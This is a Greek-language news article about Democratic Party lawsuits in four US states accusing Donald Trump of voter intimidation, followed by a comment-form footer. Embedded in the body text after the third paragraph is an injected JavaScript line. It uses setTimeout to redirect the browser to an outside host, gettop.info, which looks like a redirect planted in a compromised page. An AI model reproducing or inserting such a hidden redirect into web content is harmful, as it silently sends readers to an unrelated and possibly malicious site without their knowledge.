Οι Δημοκρατικοί προσφεύγουν στη Δικαιοσύνη κατά του Τραμπ – Τον κατηγορούν για εκφοβισμό

0
11

 

Aγωγές σε βάρος του Ντόναλντ Τραμπ σε τέσσερις αμερικανικές πολιτείες κατέθεσαν στελέχη του Δημοκρατικού Κόμματος, κατηγορώντας τον υποψήφιο των Ρεπουμπλικανών για εκφοβισμό των ψηφοφόρων των μειονοτικών ομάδων ενόψει και κατά τη διάρκεια των εκλογών της 8ης Νοεμβρίου. Επίσης, ζητούν να μπει ένα τέλος στις προσπάθειες παρακολούθησης των εκλογικών τμημάτων, που αποσκοπούν, σύμφωνα με τους ενάγοντες, στην παρενόχληση των ψηφοφρόρων.

Στις αγωγές που κατέθεσαν σε ομοσπονδιακά δικαστήρια στην Πενσιλβάνια, τη Νεβάδα, στην Αριζόνα και το Οχάιο, οι Δημοκρατικοί υποστηρίζουν ότι ο «μεγιστάνας και στελέχη του Ρεπουμπλικανικού Κόμματος έχουν επιδοθεί σε μια εντατική εκστρατεία εκφοβισμού μέσω αυτόκλητων τιμωρών των ψηφοφόρων» που παραβιάζει το Νόμο του 1965 σχετικά με τα Εκλογικά Δικαιώματα και τον νόμο του 1871 κατά της Κου Κλουξ Καν.

«Ο Τραμπ επιδιώκει να προωθήσει τον στόχο της εκστρατείας του που συνίσταται στην «καταστολή των ψηφοφόρων» χρησιμοποιώντας το δυνατότερο μικρόφωνο στην χώρα προκειμένου να εκλιπαρήσει τους υποστηρικτές τους να επιδοθούν σε έναν παράνομο εκφοβισμό» επισημαίνεται στα επίσημα έγγραφα που κατέθεσε το Δημοκρατικό Κόμμα στο Οχάιο. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here